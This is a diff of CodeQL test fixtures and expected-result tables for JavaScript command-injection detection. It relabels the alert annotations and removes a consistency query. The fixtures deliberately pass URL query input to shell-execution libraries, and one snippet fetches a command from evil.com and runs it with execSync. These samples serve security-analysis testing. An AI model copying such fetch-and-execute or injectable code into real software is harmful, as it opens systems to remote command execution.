a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js @@ -2,34 +2,34 @@ var http = require("http"), url = require("url"); var server = http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; - - require("cross-spawn").sync(cmd); // NOT OK - require("execa").shell(cmd); // NOT OK - require("execa").shellSync(cmd); // NOT OK - require("execa").stdout(cmd); // NOT OK - require("execa").stderr(cmd); // NOT OK - require("execa").sync(cmd); // NOT OK - - require("cross-spawn")(cmd); // NOT OK - require("cross-spawn-async")(cmd); // NOT OK - require("exec")(cmd); // NOT OK - require("exec-async")(cmd); // NOT OK - require("execa")(cmd); // NOT OK - require("remote-exec")(target, cmd); // NOT OK + let cmd = url.parse(req.url, true).query.path; // $ Source + + require("cross-spawn").sync(cmd); // $ Alert + require("execa").shell(cmd); // $ Alert + require("execa").shellSync(cmd); // $ Alert + require("execa").stdout(cmd); // $ Alert + require("execa").stderr(cmd); // $ Alert + require("execa").sync(cmd); // $ Alert + + require("cross-spawn")(cmd); // $ Alert + require("cross-spawn-async")(cmd); // $ Alert + require("exec")(cmd); // $ Alert + require("exec-async")(cmd); // $ Alert + require("execa")(cmd); // $ Alert + require("remote-exec")(target, cmd); // $ Alert const ssh2 = require("ssh2"); - new ssh2().exec(cmd); // NOT OK - new ssh2.Client().exec(cmd); // NOT OK + new ssh2().exec(cmd); // $ Alert + new ssh2.Client().exec(cmd); // $ Alert const SSH2Stream = require("ssh2-streams").SSH2Stream; - new SSH2Stream().exec(false, cmd); // NOT OK + new SSH2Stream().exec(false, cmd); // $ Alert - require("execa").node(cmd); // NOT OK + require("execa").node(cmd); // $ Alert - require("foreground-child")(cmd); // NOT OK + require("foreground-child")(cmd); // $ Alert const opener = require("opener"); - opener("http://github.com/" + url.parse(req.url, true).query.user); // OK - opener("http://github.com", { command: cmd }); // NOT OK + opener("http://github.com/" + url.parse(req.url, true).query.user); + opener("http://github.com", { command: cmd }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js index cec3f36aa492..deb426291d6a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js @@ -2,7 +2,7 @@ let https = require("https"), cp = require("child_process"); https.get("https://evil.com/getCommand", res => - res.on("data", command => { - cp.execSync(command); + res.on("data", command => { // $ Source + cp.execSync(command); // $ Alert }) ); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql deleted file mode 100644 index 77e19c320dff..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql +++ /dev/null @@ -1,23 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.CommandInjectionQuery as CommandInjection -import semmle.javascript.security.dataflow.IndirectCommandInjectionQuery as IndirectCommandInjection -import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentQuery as ShellCommandInjectionFromEnvironment -import semmle.javascript.security.dataflow.UnsafeShellCommandConstructionQuery as UnsafeShellCommandConstruction -import semmle.javascript.security.dataflow.SecondOrderCommandInjectionQuery as SecondOrderCommandInjectionQuery - -deprecated class CommandInjectionConsistency extends ConsistencyConfiguration { - CommandInjectionConsistency() { this = "ComandInjection" } - - override File getAFile() { not result.getBaseName() = "uselesscat.js" } -} - -import semmle.javascript.security.UselessUseOfCat - -deprecated class UselessCatConsistency extends ConsistencyConfiguration { - UselessCatConsistency() { this = "Cat" } - - override DataFlow::Node getAnAlert() { result instanceof UselessCat } - - override File getAFile() { result.getBaseName() = "uselesscat.js" } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected index af0b8090ff7b..7c7321845776 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected @@ -1,3 +1,44 @@ +#select +| actions.js:4:6:4:29 | process ... _DATA'] | actions.js:4:6:4:16 | process.env | actions.js:4:6:4:29 | process ... _DATA'] | This command depends on an unsanitized $@. | actions.js:4:6:4:16 | process.env | environment variable | +| actions.js:8:10:8:23 | e['TEST_DATA'] | actions.js:12:6:12:16 | process.env | actions.js:8:10:8:23 | e['TEST_DATA'] | This command depends on an unsanitized $@. | actions.js:12:6:12:16 | process.env | environment variable | +| actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | This command depends on an unsanitized $@. | actions.js:14:6:14:21 | getInput('data') | GitHub Actions user input | +| command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:11:14:11:20 | args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:11:14:11:20 | args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:19:14:19:17 | arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:19:14:19:17 | arg0 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | command-line argument | +| command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line argument | +| command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | command-line argument | +| command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line argument | +| command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line argument | +| command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line argument | +| command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line argument | +| command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | command-line argument | +| command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line argument | +| command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line argument | +| command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line argument | +| command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line argument | +| command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line argument | +| command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line argument | +| command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line argument | +| command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line argument | +| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line argument | +| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line argument | +| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:133:10:133:16 | program | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:133:10:133:16 | program | command-line argument | +| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line argument | +| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line argument | +| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line argument | +| command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line argument | edges | actions.js:4:6:4:16 | process.env | actions.js:4:6:4:29 | process ... _DATA'] | provenance | | | actions.js:7:15:7:15 | e | actions.js:8:10:8:10 | e | provenance | | @@ -290,44 +331,3 @@ nodes | command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | semmle.label | "cmd.sh ... zzaType | | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | semmle.label | program.pizzaType | subpaths -#select -| actions.js:4:6:4:29 | process ... _DATA'] | actions.js:4:6:4:16 | process.env | actions.js:4:6:4:29 | process ... _DATA'] | This command depends on an unsanitized $@. | actions.js:4:6:4:16 | process.env | environment variable | -| actions.js:8:10:8:23 | e['TEST_DATA'] | actions.js:12:6:12:16 | process.env | actions.js:8:10:8:23 | e['TEST_DATA'] | This command depends on an unsanitized $@. | actions.js:12:6:12:16 | process.env | environment variable | -| actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | This command depends on an unsanitized $@. | actions.js:14:6:14:21 | getInput('data') | GitHub Actions user input | -| command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:11:14:11:20 | args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:11:14:11:20 | args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:19:14:19:17 | arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:19:14:19:17 | arg0 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() | command-line argument | -| command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | command-line argument | -| command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | command-line argument | -| command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line-parameter-command-injection.js:41:10:41:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | command-line argument | -| command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line-parameter-command-injection.js:43:10:43:62 | "cmd.sh ... e().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() | command-line argument | -| command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line-parameter-command-injection.js:55:10:55:25 | "cmd.sh " + args | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:48:3:50:3 | argv: { ... rgs\\n\\t\\t} | command-line argument | -| command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line-parameter-command-injection.js:65:10:65:31 | "cmd.sh ... nt1rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | command-line argument | -| command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | command-line-parameter-command-injection.js:66:10:66:31 | "cmd.sh ... nt2rest | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | command-line argument | -| command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line-parameter-command-injection.js:69:10:69:27 | "cmd.sh " + taint3 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:68:20:68:40 | require ... ').argv | command-line argument | -| command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:71:20:71:40 | require ... ').argv | command-line argument | -| command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line-parameter-command-injection.js:79:10:79:39 | "cmd.sh ... gv).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:76:15:76:26 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line-parameter-command-injection.js:82:10:82:54 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:82:29:82:40 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line-parameter-command-injection.js:85:10:85:59 | "cmd.sh ... 2)).foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:85:34:85:45 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:88:25:88:36 | process.argv | command-line argument | -| command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | command-line argument | -| command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line-parameter-command-injection.js:102:10:102:44 | "cmd.sh ... s().foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() | command-line argument | -| command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) | command-line argument | -| command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line-parameter-command-injection.js:116:10:116:33 | "cmd.sh ... nput[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) | command-line argument | -| command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line-parameter-command-injection.js:124:10:124:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | command-line argument | -| command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | command-line argument | -| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | command-line argument | -| command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | command-line argument | -| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:133:10:133:16 | program | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:133:10:133:16 | program | command-line argument | -| command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line-parameter-command-injection.js:137:10:137:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:137:22:137:38 | program.pizzaType | command-line argument | -| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | command-line argument | -| command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | command-line argument | -| command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | This command depends on an unsanitized $@. | 